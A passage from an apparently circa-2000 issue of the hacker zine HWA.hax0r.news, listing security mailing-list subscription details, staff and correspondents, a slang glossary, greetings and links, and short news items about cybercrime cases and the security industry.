|____/ \__,_|_.__/|_| |_| |_|_|___/___/_|\___/|_| |_|___/

All submissions that are `published' are printed with the credits
you provide, if no response is received by a week or two it is assumed
that you don't care wether the article/email is to be used in an issue
or not and may be used at my discretion.

Looking for:

Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html

Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it
to the drop box.

- Ed

Mailing List Subscription Info (Far from complete) Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~

ISS Security mailing list faq : http://www.iss.net/iss/maillist.html

ATTRITION.ORG's Website defacement mirror and announcement lists
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.attrition.org/mirror/attrition/
http://www.attrition.org/security/lists.html

defaced [web page defacement announce list]

This is a public LOW VOLUME (1) mail list to circulate news/info on
defaced web sites. To subscribe to Defaced, send mail to
majordomo@attrition.org with "subscribe defaced" in the BODY of
the mail.

There will be two types of posts to this list:

1. brief announcements as we learn of a web defacement.
this will include the site, date, and who signed the
hack. we will also include a URL of a mirror of the hack.

2. at the end of the day, a summary will be posted
of all the hacks of the day. these can be found
on the mirror site listed under 'relevant links'

This list is for informational purposes only. Subscribing
denotes your acceptance of the following:

1. we have nothing to do with the hacks. at all.

2. we are only mirroring the work of OTHER people.

3. we can not be held liable for anything related to these
hacks.

4. all of the points on the disclaimer listed below.

Under no circumstances may the information on this list be used
to solicit security business. You do not have permission to forward
this mail to anyone related to the domain that was defaced.

enjoy.

List maintainer: mcintyre@attrition.org
Hosted by: majordomo@attrition.org

Relevant Links:
Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
ATTRITION Mirror: http://www.attrition.org/mirror/

(1) It is low volume on a normal day. On days of many defacements,
traffic may be increased. On a few days, it is a virtual mail
flood. You have been warned. ;)

-=-

defaced summary [web page defacement announce list]

This is a low traffic mail list to announce all publicly
defaced domains on a given day. To subscribe to Defaced-Summary, send mail to
majordomo@attrition.org with "subscribe defaced-summary" in the BODY of
the mail.

There will be ONE type of post to this list:

1. a single nightly piece of mail listing all reported
domains. the same information can be found on
http://www.attrition.org/mirror/attrition/
via sporadic updates.

This list is for informational purposes only. Subscribing
denotes your acceptance of the following:

1. we have nothing to do with the hacks. at all.

2. we are only mirroring the work of OTHER people.

3. we can not be held liable for anything related to these
hacks.

4. all of the points on the disclaimer listed below.

Under no circumstances may the information on this list be used
to solicit security business. You do not have permission to forward
this mail to anyone related to the domain that was defaced.

enjoy.

List maintainer: jericho@attrition.org
Hosted by: majordomo@attrition.org

Relevant Links:
Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
ATTRITION Mirror: http://www.attrition.org/mirror/

-=-

defaced GM [web page defacement announce list]

This is a low traffic mail list to announce all publicly
defaced government and military domains on a given day. To subscribe to
Defaced-GM, send mail to majordomo@attrition.org with "subscribe defaced-gm"
in the BODY of the mail.

There will be ONE type of post to this list:

1. sporadic pieces of mail for each government (.gov)
or military (.mil) system defaced. the same information
can be found on http://www.attrition.org/mirror/attrition/
via sporadic updates.

This list is designed primarily for government and military
personell charged with tracking security incidents on
government run networks.

This list is for informational purposes only. Subscribing
denotes your acceptance of the following:

1. we have nothing to do with the hacks. at all.

2. we are only mirroring the work of OTHER people.

3. we can not be held liable for anything related to these
hacks.

4. all of the points on the disclaimer listed below.

Under no circumstances may the information on this list be used
to solicit security business. You do not have permission to forward
this mail to anyone related to the domain that was defaced.

enjoy.

List maintainer: jericho@attrition.org
Hosted by: majordomo@attrition.org

Relevant Links:
Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
ATTRITION Mirror: http://www.attrition.org/mirror/

defaced alpha [web page defacement announce list]

This is a low traffic mail list to announce via alpha-numeric
pagers, all publicly defaced government and military domains
on a given day. To subscribe to Defaced-Alpha, send mail to
majordomo@attrition.org with "subscribe defaced-alpha" in
the BODY of the mail.

There will be ONE type of post to this list:

1. sporadic pieces of mail for each government (.gov)
or military (.mil) system defaced. the information
will only include domain names. the same information
can be found on http://www.attrition.org/mirror/attrition/
via sporadic updates.

This list is designed primarily for government and military
personell charged with tracking security incidents on
government run networks. Further, it is designed for
quick response and aimed at law enforcement agencies like
DCIS and the FBI.

To subscribe to this list, a special mail will be sent to YOUR
alpha-numeric pager. A specific response must be made within
12 hours of receiving the mail to be subscribed. If the response
is not received, it is assumed the mail was not sent to your
pager.

This list is for informational purposes only. Subscribing
denotes your acceptance of the following:

1. we have nothing to do with the hacks. at all.

2. we are only mirroring the work of OTHER people.

3. we can not be held liable for anything related to these
hacks.

4. all of the points on the disclaimer listed below.

Under no circumstances may the information on this list be used
to solicit security business. You do not have permission to forward
this mail to anyone related to the domain that was defaced.

enjoy.

List maintainer: jericho@attrition.org
Hosted by: majordomo@attrition.org

Relevant Links:
Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
ATTRITION Mirror: http://www.attrition.org/mirror/

-=-

THE MOST READ:

BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~

What is Bugtraq?

Bugtraq is a full-disclosure UNIX security mailing list, (see the info
file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to
bugtraq, send mail to listserv@netspace.org containing the message body
subscribe bugtraq. I've been archiving this list on the web since late
1993. It is searchable with glimpse and archived on-the-fly with hypermail.

Searchable Hypermail Index;

http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html

About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The following comes from Bugtraq's info file:

This list is for *detailed* discussion of UNIX security holes: what they are,
how to exploit, and what to do to fix them.

This list is not intended to be about cracking systems or exploiting their
vulnerabilities. It is about defining, recognizing, and preventing use of
security holes and risks.

Please refrain from posting one-line messages or messages that do not contain
any substance that can relate to this list`s charter.

I will allow certain informational posts regarding updates to security tools,
documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
on this list.

Please follow the below guidelines on what kind of information should be posted
to the Bugtraq list:

+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security organizations
+ Incident advisories or informational reporting

Any non-essential replies should not be directed to the list but to the originator of the message. Please do not
"CC" the bugtraq reflector address if the response does not meet the above criteria.

Remember: YOYOW.

You own your own words. This means that you are responsible for the words that you post on this list and that
reproduction of those words without your permission in any medium outside the distribution of this list may be
challenged by you, the author.

For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)

UPDATED Sept/99 - Sent in by Androthi, tnx for the update
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

I am pleased to inform you of several changes that will be occurring
on June 5th. I hope you find them as exciting as I do.

BUGTRAQ moves to a new home
---------------------------

First, BUGTRAQ will be moving from its current home at NETSPACE.ORG
to SECURITYFOCUS.COM. What is Security Focus you ask? Wait and read
below. Other than the change of domains nothing of how the list
is run changes. I am still the moderator. We play by the same rules.

Security Focus will be providing mail archives for BUGTRAQ. The
archives go back longer than Netspace's and are more complete than
Geek-Girl's.

The move will occur one week from today. You will not need to
resubscribe. All your information, including subscription options
will be moved transparently.

Any of you using mail filters (e.g. procmail) to sort incoming
mail into mail folders by examining the From address will have to
update them to include the new address. The new address will be:

BUGTRAQ@SECURITYFOCUS.COM

Security Focus also be providing a free searchable vulnerability
database.

BUGTRAQ es muy bueno
--------------------

It has also become apparent that there is a need for forums
in the spirit of BUGTRAQ where non-English speaking people
or people that don't feel comfortable speaking English can
exchange information.

As such I've decided to give BUGTRAQ in other languages a try.
BUGTRAQ will continue to be the place to submit vulnerability
information, but if you feel more comfortable using some other
language you can give the other lists a try. All relevant information
from the other lists which have not already been covered here
will be translated and forwarded on by the list moderator.

In the next couple of weeks we will be introducing BUGTRAQ-JP
(Japanese) which will be moderated by Nobuo Miwa <n-miwa@lac.co.jp>
and BUGTRAQ-SP (Spanish) which will be moderated by CORE SDI S.A.
from Argentina <http://www.core-sdi.com/> (the folks that brought you
Secure Syslog and the SSH insertion attack).

What is Security Focus?
-----------------------

Security Focus is an exercise in creating a community and a security
resource. We hope to be able to provide a medium where useful and
successful resources such as BUGTRAQ can occur, while at the same
time providing a comprehensive source of security information. Aside
from moving just BUGTRAQ over, the Geek-Girl archives (and the Geek Girl
herself!) have moved over to Security Focus to help us with building
this new community. The other staff at Security Focus are largely derived
from long time supporters of Bugtraq and the community in general. If
you are interested in viewing the staff pages, please see the 'About'
section on www.securityfocus.com.

On the community creating front you will find a set of forums
and mailing lists we hope you will find useful. A number of them
are not scheduled to start for several weeks but starting today
the following list is available:

* Incidents' Mailing List. BUGTRAQ has always been about the
discussion of new vulnerabilities. As such I normally don't approve
messages about break-ins, trojans, viruses, etc with the exception
of wide spread cases (Melissa, ADM worm, etc). The other choice
people are usually left with is email CERT but this fails to
communicate this important information to other that may be
potentially affected.

The Incidents mailing list is a lightly moderated mailing list to
facilitate the quick exchange of security incident information.
Topical items include such things as information about rootkits
new trojan horses and viruses, source of attacks and tell-tale
signs of intrusions.

To subscribe email LISTSERV@SECURITYFOCUS.COM with a message body
of:

SUBS INCIDENTS FirstName, LastName

Shortly we'll also be introducing an Information Warfare forum along
with ten other forums over the next two months. These forums will be
built and moderated by people in the community as well as vendors who
are willing to take part in the community building process.
*Note to the vendors here* We have several security vendors who have
agreed to run forums where they can participate in the online communities.
If you would like to take part as well, mail Alfred Huger,
ahuger@securityfocus.com.

On the information resource front you find a large database of
the following:

* Vulnerabilities. We are making accessible a free vulnerability
database. You can search it by vendor, product and keyword. You
will find detailed information on the vulnerability and how to fix it,
as well are links to reference information such as email messages,
advisories and web pages. You can search by vendor, product and
keywords. The database itself is the result of culling through 5
years of BUGTRAQ plus countless other lists and news groups. It's
a shining example of how thorough full disclosure has made a significant
impact on the industry over the last half decade.

* Products. An incredible number of categorized security products
from over two hundred different vendors.

* Services. A large and focused directory of security services offered by
vendors.

* Books, Papers and Articles. A vast number of categorized security
related books, papers and articles. Available to download directly
for our servers when possible.

* Tools. A large array of free security tools. Categorized and
available for download.

* News: A vast number of security news articles going all the way
back to 1995.

* Security Resources: A directory to other security resources on
the net.

As well as many other things such as an event calendar.

For your convenience the home-page can be personalized to display
only information you may be interested in. You can filter by
categories, keywords and operating systems, as well as configure
how much data to display.

I'd like to thank the fine folks at NETSPACE for hosting the
site for as long as they have. Their services have been invaluable.

I hope you find these changes for the best and the new services
useful. I invite you to visit http://www.securityfocus.com/ and
check it out for yourself. If you have any comments or suggestions
please feel free to contact me at this address or at
aleph1@securityfocus.com.

Cheers.

--
Aleph One / aleph1@underground.org
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01

Crypto-Gram
~~~~~~~~~~~

CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.

To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com.� To unsubscribe,
visit http://www.counterpane.com/unsubform.html.� Back issues are available
on http://www.counterpane.com.

CRYPTO-GRAM is written by Bruce Schneier.� Schneier is president of
Counterpane Systems, the author of "Applied Cryptography," and an inventor
of the Blowfish, Twofish, and Yarrow algorithms.� He served on the board of
the International Association for Cryptologic Research, EPIC, and VTW.� He
is a frequent writer and lecturer on cryptography.

CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This info directly from their latest ish:

Computer underground Digest��� Sun� 14 Feb, 1999�� Volume 11 : Issue 09
�����
��������������������� ISSN� 1004-042X

������ Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
������ News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
������ Archivist: Brendan Kehoe
������ Poof Reader:�� Etaion Shrdlu, Jr.
������ Shadow-Archivists: Dan Carosone / Paul Southworth
������������������������� Ralph Sims / Jyrki Kuoppala
������������������������� Ian Dickinson
������ Cu Digest Homepage: http://www.soci.niu.edu/~cudigest

[ISN] Security list
~~~~~~~~~~~~~~~~~~~
This is a low volume list with lots of informative articles, if I had my
way i'd reproduce them ALL here, well almost all .... ;-) - Ed

UPDATED Sept/99 - Sent in by Androthi, tnx for the update
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

--[ New ISN announcement (New!!)

Sender: ISN Mailing List <ISN@SECURITYFOCUS.COM>
From: mea culpa <jericho@DIMENSIONAL.COM>
Subject: Where has ISN been?
Comments: To: InfoSec News <isn@securityfocus.com>
To: ISN@SECURITYFOCUS.COM

It all starts long ago, on a network far away..

Not really. Several months ago the system that hosted the ISN mail list
was taken offline. Before that occured, I was not able to retrieve the
subscriber list. Because of that, the list has been down for a while. I
opted to wait to get the list back rather than attempt to make everyone
resubscribe.

As you can see from the headers, ISN is now generously being hosted by
Security Focus [www.securityfocus.com]. THey are providing the bandwidth,
machine, and listserv that runs the list now.

Hopefully, this message will find all ISN subscribers, help us weed out
dead addresses, and assure you the list is still here. If you have found
the list to be valuable in the past, please tell friends and associates
about the list. To subscribe, mail listserv@securityfocus.com with
"subscribe isn firstname lastname". To unsubscribe, "unsubscribe isn".

As usual, comments and suggestions are welcome. I apologize for the down
time of the list. Hopefully it won't happen again. ;)

mea_culpa
www.attrition.org

--[ Old ISN welcome message

[Last updated on: Mon Nov 04 0:11:23 1998]

InfoSec News is a privately run, medium traffic list that caters
to distribution of information security news articles. These
articles will come from newspapers, magazines, online resources,
and more.

The subject line will always contain the title of the article, so that
you may quickly and effeciently filter past the articles of no interest.

This list will contain:

o Articles catering to security, hacking, firewalls, new security
encryption, products, public hacks, hoaxes, legislation affecting
these topics and more.

o Information on where to obtain articles in current magazines.

o Security Book reviews and information.

o Security conference/seminar information.

o New security product information.

o And anything else that comes to mind..

Feedback is encouraged. The list maintainers would like to hear what
you think of the list, what could use improving, and which parts
are "right on". Subscribers are also encouraged to submit articles
or URLs. If you submit an article, please send either the URL or
the article in ASCII text. Further, subscribers are encouraged to give
feedback on articles or stories, which may be posted to the list.

Please do NOT:

* subscribe vanity mail forwards to this list

* subscribe from 'free' mail addresses (ie: juno, hotmail)

* enable vacation messages while subscribed to mail lists

* subscribe from any account with a small quota

All of these generate messages to the list owner and make tracking
down dead accounts very difficult. I am currently receiving as many
as fifty returned mails a day. Any of the above are grounds for
being unsubscribed. You are welcome to resubscribe when you address
the issue(s).

Special thanks to the following for continued contribution:
William Knowles, Aleph One, Will Spencer, Jay Dyson,
Nicholas Brawn, Felix von Leitner, Phreak Moi and
other contributers.

ISN Archive: ftp://ftp.repsec.com/pub/text/digests/isn
ISN Archive: http://www.landfield.com/isn
ISN Archive: http://www.jammed.com/Lists/ISN/

ISN is Moderated by 'mea_culpa' <jericho@dimensional.com>. ISN is a
private list. Moderation of topics, member subscription, and
everything else about the list is solely at his discretion.

The ISN membership list is NOT available for sale or disclosure.

ISN is a non-profit list. Sponsors are only donating to cover bandwidth
and server costs.

Win2k Security Advice Mailing List (new added Nov 30th)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

To subscribe:

send "SUBSCRIBE WIN2KSECADVICE anonymous or name" in the message body
to listserv@listserv.ntsecurity.net

Welcome to Win2K Security Advice! Thank you for subscribing. If you have any
questions or comments about the list please feel free to contact the list
moderator, Steve Manzuik, at steve@win2ksecadvice.net.

To see what you've missed recently on the list, or to research an item
of interest, be sure to visit the Web-based archives located at:
http://www.ntsecurity.net/scripts/page_listserv.asp?s=win2ksec

==============
NTSecurity.net brings the security community a brand new (Oct 99) and
much-requested Windows security mailing list. This new moderated mailing list,
Win2KSecAdvice (formerly NTSecAdvice,) is geared towards promoting the open
discussion of Windows-related security issues.

With a firm and unwavering commitment towards timely full disclosure, this
new resource promises to become a great forum for open discussion
regarding security-related bugs, vulnerabilities, potential exploits, virus,
worms, Trojans, and more. Win2KSecAdvice promotes a strong sense of community
and we openly invite all security minded individuals, be they white hat,
gray hat, or black hat, to join the new mailing list.

While Win2KSecAdvice was named in the spirit of Microsoft's impending product
line name change, and meant to reflect the list's security focus both now and
in the long run, it is by no means limited to security topics centered around
Windows 2000. Any security issues that pertain to Windows-based networking are
relevant for discussion, including all Windows operating systems, MS Office,
MS BackOffice, and all related third party applications and hardware.

The scope of Win2KSecAdvice can be summarized very simply: if it's relevant to
a security risk, it's relevant to the list.

The list archives are available on the Web at http://www.ntsecurity.net,
which include a List Charter and FAQ, as well as Web-based searchable list
archives for your research endeavors.

SAVE THIS INFO FOR YOUR REFERENCE:

To post to the list simply send your email to
win2ksecadvice@listserv.ntsecurity.net

To unsubscribe from this list, send UNSUBSCRIBE WIN2KSECADVICE to
listserv@listserv.ntsecurity.net

Regards,

Steve Manzuik, List Moderator
Win2K Security Advice
steve@win2ksecadvice.net

@HWA

00.3 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~

__ ___ ___
\ \ / / |__ ___ __ _ _ __ _____ ____|__ \
\ \ /\ / /| '_ \ / _ \ / _` | '__/ _ \ \ /\ / / _ \/ /
\ V V / | | | | (_) | (_| | | | __/\ V V / __/_|
\_/\_/ |_| |_|\___/ \__,_|_| \___| \_/\_/ \___(_)

Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/programming/IRC+ man in black
sas2@usa.net .............. currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
twisted-pair@home.com......: currently active/programming/IRC+

Foreign Correspondants/affiliate members (Active)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Qubik ............................: United Kingdom
D----Y ...........................: USA/world media
Zym0t1c ..........................: Dutch/Germany/Europe
Sla5h.............................: Croatia
HWA members ......................: World Media

Past Foreign Correspondants (currently inactive or presumed dead)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

N0Portz ..........................: Australia
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland
Wyze1.............................: South Africa

Please send in your sites for inclusion here if you haven't already
also if you want your emails listed send me a note ... - Ed

Spikeman's site is down as of this writing, if it comes back online it will be
posted here.

http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)

Sla5h's email: smuddo@yahoo.com

*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*******************************************************************

:-p

1. We do NOT work for the government in any shape or form.Unless you count paying
taxes ... in which case we work for the gov't in a BIG WAY. :-/

2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news
events its a good idea to check out issue #1 at least and possibly also the
Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...

@HWA

00.4 Whats in a name? why HWA.hax0r.news??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Well what does HWA stand for? never mind if you ever find out I may
have to get those hax0rs from 'Hackers' or the Pretorians after you.

In case you couldn't figure it out hax0r is "new skewl" and although
it is laughed at, shunned, or even pidgeon holed with those 'dumb
leet (l33t?) dewds' <see article in issue #4> this is the state
of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
up and comers, i'd highly recommend you get that book. Its almost
like buying a clue. Anyway..on with the show .. - Editorial staff

@HWA

00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

_ ___ ___ _____ _ ___
| | | \ \ / / \ | ___/ \ / _ \
| |_| |\ \ /\ / / _ \ | |_ / _ \| | | |
| _ | \ V V / ___ \ _| _/ ___ \ |_| |
|_| |_| \_/\_/_/ \_(_)_|/_/ \_\__\_\

Also released in issue #3. (revised) check that issue for the faq
it won't be reprinted unless changed in a big way with the exception
of the following excerpt from the FAQ, included to assist first time
readers:

Some of the stuff related to personal useage and use in this zine are
listed below: Some are very useful, others attempt to deny the any possible
attempts at eschewing obfuscation by obsucuring their actual definitions.

@HWA - see EoA ;-)

!= - Mathematical notation "is not equal to" or "does not equal"
ASC(247) "wavey equals" sign means "almost equal" to. If written
an =/= (equals sign with a slash thru it) also means !=, =< is Equal
to or less than and => is equal to or greater than (etc, this aint
fucking grade school, cripes, don't believe I just typed all that..)

AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)

AOL - A great deal of people that got ripped off for net access by a huge
clueless isp with sekurity that you can drive buses through, we're
not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
least they could try leasing one??

*CC - 1 - Credit Card (as in phraud)
2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's

CCC - Chaos Computer Club (Germany)

*CON - Conference, a place hackers crackers and hax0rs among others go to swap
ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
watch videos and seminars, get drunk, listen to speakers, and last but
not least, get drunk.
*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
speak he's the guy that breaks into systems and is often (but by no
means always) a "script kiddie" see pheer
2 . An edible biscuit usually crappy tasting without a nice dip, I like
jalapeno pepper dip or chives sour cream and onion, yum - Ed

Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger
Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
ebonics, speaking in a dark tongue ... being ereet, see pheer

EoC - End of Commentary

EoA - End of Article or more commonly @HWA

EoF - End of file

EoD - End of diatribe (AOL'ers: look it up)

FUD - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt",
usually in general media articles not high brow articles such as ours or other
HNN affiliates ;)

du0d - a small furry animal that scurries over keyboards causing people to type
weird crap on irc, hence when someone says something stupid or off topic
'du0d wtf are you talkin about' may be used.

*HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R

*HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
define, I think it is best defined as pop culture's view on The Hacker ala
movies such as well erhm "Hackers" and The Net etc... usually used by "real"
hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
some coffee?' or can you hax0r some bread on the way to the table please?'

2 - A tool for cutting sheet metal.

HHN - Maybe a bit confusing with HNN but we did spring to life around the same
time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
noun means the hackernews site proper. k? k. ;&

HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html

J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d

MFI/MOI- Missing on/from IRC

NFC - Depends on context: No Further Comment or No Fucking Comment

NFR - Network Flight Recorder (Do a websearch) see 0wn3d

NFW - No fuckin'way

*0WN3D - You are cracked and owned by an elite entity see pheer
*OFCS - Oh for christ's sakes

PHACV - And variations of same <coff>
Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare

Alternates: H - hacking, hacktivist
C - Cracking <software>
C - Cracking <systems hacking>
V - Virus
W - Warfare <cyberwarfare usually as in Jihad>
A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
P - Phreaking, "telephone hacking" PHone fREAKs ...
CT - Cyber Terrorism

*PHEER - This is what you do when an ereet or elite person is in your presence
see 0wn3d

*RTFM - Read the fucking manual - not always applicable since some manuals are
pure shit but if the answer you seek is indeed in the manual then you
should have RTFM you dumb ass.

TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0

TBA - To Be Arranged/To Be Announced also 2ba

TFS - Tough fucking shit.

*w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions
from the underground masses. also "w00ten" <sic>

2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)

*wtf - what the fuck, where the fuck, when the fuck etc ..

*ZEN - The state you reach when you *think* you know everything (but really don't)
usually shortly after reaching the ZEN like state something will break that
you just 'fixed' or tweaked.

@HWA

-=- :. .: -=-

01.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

____ _
/ ___|_ __ ___ ___| |_ ___
| | _| '__/ _ \/ _ \ __/ __|
| |_| | | | __/ __/ |_\__ \
\____|_| \___|\___|\__|___/

Thanks to all in the community for their support and interest but i'd
like to see more reader input, help me out here, whats good, what sucks
etc, not that I guarantee i'll take any notice mind you, but send in
your thoughts anyway.

* all the people who sent in cool emails and support

FProphet Pyra TwstdPair _NeM_
D----Y Dicentra vexxation sAs72
Spikeman p0lix Vortexia Wyze1
Pneuma Raven Zym0t1c duro
Repluzer astral BHZ ScrewUp
Qubik gov-boi _Jeezus_ Haze_
thedeuce ytcracker loophole BlkOps

Folks from #hwa.hax0r,news and #fawkerz, and other leet
secret channels, mad props! ... ;-)

Ken Williams/tattooman ex-of PacketStorm,

Kevin Mitnick

Kevin is due to be released from federal prison on January 21st 2000
for more information on his story visit http://www.freekevin.com/

kewl sites:

+ http://blkops.venomous.net/ NEW
+ http://www.hack.co.za NEW
+ http://blacksun.box.sk. NEW
+ http://packetstorm.securify.com/ NEW
+ http://www.securityportal.com/ NEW
+ http://www.securityfocus.com/ NEW
+ http://www.hackcanada.com/
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://ech0.cjb.net/

@HWA

01.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

_ _ ____ _
| \ | | _____ _____| __ ) _ _| |_ ___ ___
| \| |/ _ \ \ /\ / / __| _ \| | | | __/ _ Y __|
| |\ | __/\ V V /\__ \ |_) | |_| | || __|__ \
|_| \_|\___| \_/\_/ |___/____/ \__, |\__\___|___/
|___/

"What is popular isn't always right, and what is right isn't
always popular..."
- FProphet '99

+++ When was the last time you backed up your important data?

++ FBI Investigating 20 Y2K threats

The FBI said Thursday it had moved to thwart up to 20 or so possible
threats against targets such as power plants and computer networks
during a heightened security watch that started before 2000 dawned.

Read the article at:
http://www.zdnet.com/zdnn/stories/news/0,4586,2418190,00.html?chkpt=zdnntop

++ L0pht joins e-security firm

L0pht Heavy Industries to serve as research and development arm for new
company hoping to secure e-commerce.

CAMBRIDGE, Mass. - Armed with $10 million in venture fonding and a
phalanx of Internet industry veterans, startup firm AtStake Inc. on
Thursday announced plans to help secure the e-commerce revolution.

Read the article at:
http://www.zdnet.com/zdnn/stories/news/0,4586,2417831,00.html?chkpt=zdnntop

Read the dutch article at:
http://www.zdnet-be.com/zdbe.asp?ch=NI&artid=4054

++ Microsoft under media attack in China

Software giant Microsoft Corp. has run into more bad publicity in China
with a newspaper reporting that its latest Windows 2000 operating
system will be barred throughout the government.
Instead, ministries would use "Red Flag-Linux," a new software platform
developed by Chinese researchers and based on upstart operating system
Linux.

Read the article at:
http://www.zdnet.com/zdnn/stories/news/0,4586,2417828,00.html

Read the dutch article at:
http://www.zdnet-be.com/zdbe.asp?ch=NI&artid=4141

++ China will handle piracy

Unless pirates won't hand in all their illegal audio- and DVD-copies
before January, 15th, the Chinese authorities will take measures.
Pirates may then expect heavy penalties.

Read the (short) dutch article at:
http://www.zdnet-be.com/zdbe.asp?ch=NI&artid=4140

++ Y2K-patch crashes important flight controle systems

Representatives of the American union Professional Airway Systems
Specialists (PASS) claim that important flight controle systems
crashed because of a Y2K-patch installed by the Federal Aviation
Administration (FAA). Because of this, airplanes weren't able to take
off at the East side of the US.

Read the dutch article at:
http://www.zdnet-be.com/zdbe.asp?ch=NI&artid=4137

++ Clinton declares war on cyberterrorists

WASHINGTON - The White House planned to announce on Friday new steps to
protect America's computer systems from hackers and viruses. These
steps also include education subsidies for college students if they
agree to work for the government after developing computer-security
skills.

Read the article at:
http://www.zdnet.com/zdnn/stories/news/0,4586,2418619,00.html?chkpt=zdnntop

++ Teen hacks 27 ISPs, gains root access

A 16-year-old hacker affiliated with the cybergang known as Global Hell
compromised at least 27 Internet service providers late last year, stealing
passwords and, in some cases, destroying data, according to details of a
police investigation released Monday.

Read the article at:
http://www.zdnet.com/zdnn/stories/news/0,4586,2419466,00.html?chkpt=zdnntop

++ Data thief blackmails e-tailer

eUniverse (an online retailer) confirmed monday that it was the victim of a
data theft and virtual blackmail attempt over the weekend.
A 19-year-old Russion hacker blackmailed CD Universe into paying $100 000,
otherwise he would publish thousands of credit card codes on the net, and so
he did.

Read the article at:
http://www.zdnet.com/zdnn/stories/news/0,4586,2419750,00.html

Read the dutch article at:
http://www.zdnet-be.com/zdbe.asp?ch=NI&artid=4173

++ Reno rallies cybercrime fighters

U.S. Attorney General Janet Reno on Monday outlined plans for the federal
government to battle all cybercrime by teaming up with U.S. states to
establish a secure online information clearinghouse.

Read the article at:
http://www.zdnet.com/zdnn/stories/news/0,4586,2419984,00.html

Thanks to myself for providing the info from my wired news feed and others from whatever
sources, Zym0t1c and also to Spikeman for sending in past entries.... - Ed

@HWA

01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Yeah we have a message board, feel free to use it, remember there are no stupid questions...
